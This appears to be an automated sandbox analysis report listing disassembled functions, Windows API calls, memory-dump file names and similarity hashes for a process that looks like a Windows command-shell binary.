                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2941894976-4258593460
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 87eccfafb1310f8e83afc8c1054f93769a738f313b3e167284e15175f6114fd1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0413265618791C6EA20AB19EC2427BF7A1FF89B90F885230DE5D03B95DF3CE545CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0148
                                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 734197835-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b6f3c44f3bddd5d73f701b162a91d6348028be242adc21f5e4b1d1ef964c9e9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE619235A18792C6E720AB25AC2037BFA91BF45B58F848131D99E43794DF3DA54AC710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Enum$Openwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3402383852-1459555574
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd7774f3eeb1bb8051a583f669882c09c209f2df1e8e0a3a2d05f538a7c0d902
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71A1A421A0874292EA11AB55DC602BBE3A0FF85B94FD84631DB4E077D6DF7DE941C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 243296809-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60be762bc2f238b34bdb0c88eec8624aee1e9c873850d371e085b00f3290e1ac
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA19E2270978686EF21EB21DC603FAA391FF48799F904135DA4D4B695DF3CE646C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB1F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DIRCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c55531eb54789366c3258dd2569913d9856292727ababeaf9ab1e689f2bac408
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0814B72A18BC18AEB20EF20AC902EE77A4FF48748F945139DB8D57B58DF38D2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF706EB99DD), ref: 00007FF706EB9A39
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBDF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF706EBCEAA), ref: 00007FF706EBDFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBDF60: RtlFreeHeap.NTDLL ref: 00007FF706EBDFCC
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBDF60: _setjmp.MSVCRT ref: 00007FF706EBE03E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF706EB99DD), ref: 00007FF706EB9AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF706EB99DD), ref: 00007FF706EB9B0F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB96E8: memset.MSVCRT ref: 00007FF706EB97B2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EB9880
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 00007FF706ECB844
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 00007FF706ECB86D
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3663254013-2924197646
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 533edc6cc318995531ec2aff9f209e43a9e783e6cbda5aeae4b7c31cbe4a1832
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8518B21F0974381EE14BB259C7127BA6A1BF49BA4FC85635DA1E477D5DF3CE8028720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBF173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7184e7db3019b64e42f27e06f11d0d61442684acb06a435cad359ad972d31f00
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41BFA5E0875386FB646B15AD3437BF6E0BF10755FC4A235CE8D421A4DF3CA8868720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 930873262-1938371929
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d809683f12e4d1075b1d81adeaa20de2c7894a178e76150d0756c35653e0da82
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A416E65A08B82D2EB20BB60EC612BBE2A0FF88754FC58135DA5E436D5DF3CE5458760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3249344982-2616576482
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e3474a9137e8a47e1c7b2e29326fe0a0d79e6716139bc5cdd6f28db6393d92ec
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39414C72A18B82C6E7109F12AC5436BFAA4FB89BD8F859234DA4D07B94CF3CD0558B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6A73
